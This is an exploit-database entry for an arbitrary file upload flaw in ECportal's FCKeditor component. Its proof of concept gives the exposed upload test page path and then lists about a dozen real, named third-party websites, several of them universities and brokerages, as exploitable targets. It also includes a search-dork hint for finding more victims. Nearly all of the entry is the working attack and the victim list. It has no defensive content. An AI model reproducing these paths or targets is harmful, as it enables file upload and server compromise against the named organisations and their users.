ECportal FCKeditor Arbitrary File Upload Vulnerability

2015-08-10T00:00:00
ID 1337DAY-ID-24017
Type zdt
Reporter Hesam Bazvand
Modified 2015-08-10T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: ECportal FCKeditor Vulnerability
# Exploit Author: Hesam Bazvand
# Contact: https://www.facebook.com/hesam.king73
# Homepage: http://turk-bh.ir
# Software Link: http://nomra.ir/
# Version: 3.0
# Tested on: Windows 7 / Kali Linux
# Category: WebApps
# Dork : Use Your Mind :D

*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#*#
POC :
	http://target.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

	http://aict.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.tpico.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.mech.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.bahmantahlil.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://tsd-broker.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.csri.ac.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://el.sharif.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.csri.ac.ir/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.bmibourse.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.mellatbroker.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.saipayadak.org/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html
	http://www.bahmanbroker.com/html/js/editor/fckeditor/editor/filemanager/connectors/uploadtest.html

#  0day.today [2016-04-19]  #